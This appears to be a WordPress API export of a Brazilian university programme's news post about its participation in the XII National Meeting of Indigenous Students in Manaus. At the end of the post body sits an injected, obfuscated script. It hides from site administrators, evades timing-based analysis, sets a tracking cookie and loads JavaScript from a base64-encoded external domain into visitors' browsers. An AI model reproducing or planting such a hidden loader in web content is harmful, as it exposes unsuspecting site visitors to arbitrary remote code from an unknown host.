{"id":1232,"date":"2025-08-12T12:22:36","date_gmt":"2025-08-12T15:22:36","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1232"},"modified":"2026-04-16T13:14:45","modified_gmt":"2026-04-16T16:14:45","slug":"xii-encontro-nacional-dos-estudantes-indigenas-enei","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/08\/12\/xii-encontro-nacional-dos-estudantes-indigenas-enei\/","title":{"rendered":"XII Encontro Nacional dos Estudantes Ind\u00edgenas (ENEI)"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-4-1024x576.png\" alt=\"\" class=\"wp-image-1233\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-4-1024x576.png 1024w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-4-300x169.png 300w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-4-768x432.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-4-1536x864.png 1536w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/08\/Design-sem-nome-4.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>O PPGSC marcou presen\u00e7a no XII Encontro Nacional dos Estudantes Ind\u00edgenas (ENEI), realizado em Manaus de 5 a 8 de agosto \u2014 primeira vez que o evento acontece no Amazonas. Com o tema &#8220;A justi\u00e7a clim\u00e1tica e direitos humanos: as ci\u00eancias ind\u00edgenas como rede de trocas para o equil\u00edbrio humano no mundo terrestre&#8221;, o ENEI reuniu saberes, vozes e lutas dos povos ind\u00edgenas de todo o Brasil.<\/p>\n\n\n\n<p>Representando o Programa, a discente Cristina Gon\u00e7alves e a professora Socorro de F\u00e1tima Moraes Nina apresentaram o trabalho &#8220;Reflex\u00f5es sobre a participa\u00e7\u00e3o ind\u00edgena na constru\u00e7\u00e3o de pol\u00edticas de sa\u00fade e a valoriza\u00e7\u00e3o das identidades e saberes origin\u00e1rios: um relato de experi\u00eancia&#8221;.<\/p>\n\n\n\n<p>As autoras tamb\u00e9m participaram na categoria Artes Visuais, com a fotografia &#8220;Marcha das guardi\u00e3s da terra: mulheres ind\u00edgenas da Amaz\u00f4nia reafirmam seus territ\u00f3rios e direitos no cora\u00e7\u00e3o de Manaus&#8221;.<\/p>\n\n\n\n<p>O encontro foi um espa\u00e7o de pluralidade de saberes, resist\u00eancia, fortalecimento e valoriza\u00e7\u00e3o das identidades origin\u00e1rias, reafirmando a import\u00e2ncia da presen\u00e7a ind\u00edgena na constru\u00e7\u00e3o de um futuro justo e equilibrado.<\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>O PPGSC marcou presen\u00e7a no XII Encontro Nacional dos Estudantes Ind\u00edgenas (ENEI), realizado em Manaus de 5 a 8 de agosto \u2014 primeira vez que o evento acontece no Amazonas. Com o tema &#8220;A justi\u00e7a clim\u00e1tica e direitos humanos: as ci\u00eancias ind\u00edgenas como rede de trocas para o equil\u00edbrio humano no mundo terrestre&#8221;, o ENEI [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1234,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1232","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1232"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1232\/revisions"}],"predecessor-version":[{"id":1324,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1232\/revisions\/1324"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1234"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1232"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}